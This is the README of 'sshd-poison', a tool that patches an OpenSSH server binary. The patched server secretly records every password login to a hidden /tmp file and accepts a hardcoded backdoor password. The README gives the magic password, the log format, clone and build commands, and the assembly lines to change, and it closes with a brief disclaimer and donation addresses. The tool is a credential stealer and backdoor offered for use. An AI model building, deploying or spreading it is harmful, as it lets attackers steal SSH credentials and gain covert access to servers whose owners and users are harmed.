sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.
This only works with x86_64-elf file. Should work with openssh 7.7p1 up to 8.3p1. The code need some modifications to work with older versions.
OpenSSH versions tested:
- OpenSSH_7.9p1 Debian-10+deb10u2, OpenSSL 1.1.1d 10 Sep 2019
- OpenSSH_8.3p1, OpenSSL 1.1.1g 21 Apr 2020
Unhappily, the power of this magic is a bit limited. If you try login as root, and root login is not allowed, or if the user isn't valid, it won't work.
magic-pass is anneeeeeeeeeeee.
Captured passwords are stored in /tmp/.nothing.
The strings are saved in reverse order in the following format: \0password\0user\0ip, or rather \0drowssap\0resu\0pi.
$ git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
$ cd sshd-poison
$ make
If you want a different magic-pass/logfile, edit the following lines in sc.asm.
magic_pass: db 'anneeeeeeeeeeee', 0x0
logfile: db '/tmp/.nothing', 0x0
Use for illegal purposes are not allowed.
You can help with code, or donating money. If you wanna help with code, use the kernel code style as a reference.
Paypal:
BTC: 19p3bnJ1t7DByfD8LdgU6WRSnUc2ftBxkP